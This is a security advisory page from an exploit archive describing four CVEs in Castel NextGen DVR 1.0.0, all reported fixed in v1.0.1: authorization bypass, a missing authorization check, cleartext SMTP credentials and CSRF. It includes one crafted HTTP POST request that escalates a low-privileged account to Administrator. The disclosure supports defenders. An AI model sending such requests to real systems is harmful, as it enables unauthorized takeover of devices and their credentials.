exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Castel NextGen DVR 1.0.0 Bypass / CSRF / Disclosure

Castel NextGen DVR 1.0.0 Bypass / CSRF / Disclosure
Posted Jun 5, 2020
Authored by Aaron Bishop

Castel NextGen DVR version 1.0.0 suffers from authorization bypass, credential disclosure, and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, bypass, info disclosure, csrf
advisories | CVE-2020-11679, CVE-2020-11680, CVE-2020-11681, CVE-2020-11682
SHA-256 | 479f4579b4b9aa4978606f0a9f84e9bbac7947654e1a57a9e42f9f18e0988c1b

Castel NextGen DVR 1.0.0 Bypass / CSRF / Disclosure

Change Mirror Download
All issues are associated with *Castel NextGen DVR v1.0.0 *and have been
resolved in v1.0.1*.*

-------------------------------
*CVE-2020-11679
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679>*


*Original Disclosure*
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

*Description*
A low privileged user can call functionality reserved for an Administrator
which promotes a low privileged account to the Administrator role:

POST /Administration/Users/Edit/:ID HTTP/1.1
> Host: $RHOST
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
> Firefox/52.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Cookie: $REVIEWER_COOKIES
> DNT: 1
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 349


> UserId=:ID&Email=bypass%40test.com
> &FirstName=bypass&LastName=bypass&LDAPUser=false
>
> &Roles%5B0%5D.RoleId=1&Roles%5B0%5D.IsSelected=true&Roles%5B0%5D.IsSelected=false
>
> &Roles%5B1%5D.RoleId=3&Roles%5B1%5D.IsSelected=true&Roles%5B1%5D.IsSelected=false
>
> &Roles%5B2%5D.RoleId=5&Roles%5B2%5D.IsSelected=true&Roles%5B2%5D.IsSelected=false
> &Locked=false

-------------------------------
*CVE-2020-11680
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680>*

*Original Disclosure*
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

*Description*
The application does not perform an authorization check before
functionality is performed. Low privileged users are prevented from
browsing to pages that perform Administrator functionality using GET,
however, functionality can be performed by directly crafting the associated
POST request. This can be exploited to modify user accounts, modify the
application, etc. Combined with the reported CSRF, CVE-2020-11682, any
user of the application can be used to grant Administrator access to a
malicious user.
-------------------------------
*CVE-2020-11681
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681>*

*Original Disclosure*
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

*Description*
Credentials are returned in cleartext in the source of the SMTP page. If a
malicious user compromises an account. or exploits the CSRF to gain access
to the application, the associated SMTP server/account could also be
compromised.
-------------------------------
*CVE-2020-11682
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682>*

*Original Disclosure*
https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf

*Description*
The application does not properly prevent CSRF; the
__RequestVerificationToken, which is included with state changing requests,
is not verified by the application - requests are successful even when the
token is removed.

AARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE [image:
SecurityMetrics]


Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close